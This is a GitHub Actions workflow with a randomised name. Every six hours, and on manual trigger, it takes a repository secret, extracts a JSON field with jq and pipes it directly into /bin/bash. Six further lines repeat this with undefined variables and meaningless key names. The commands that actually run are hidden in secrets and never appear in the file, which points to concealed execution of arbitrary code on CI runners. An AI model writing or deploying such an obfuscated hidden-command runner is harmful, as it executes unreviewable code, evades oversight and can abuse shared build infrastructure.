name: tulongzhe2345

on:
  workflow_dispatch:
  schedule:
    - cron: '57 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: tulongzhe2345
        env:
          x9: ${{ secrets.x9 }}
        run: |
          echo $x9 | jq -r .scc12626 | /bin/bash
          echo $p0577 | jq -r .look107 | /bin/bash
          echo $qruw8 | jq -r .lt7 | /bin/bash
          echo $obz929 | jq -r .y2926 | /bin/bash
          echo $biaw84 | jq -r .e03152 | /bin/bash
          echo $hti464 | jq -r .qkdv5300 | /bin/bash
          echo $aw978 | jq -r .zdl076 | /bin/bash

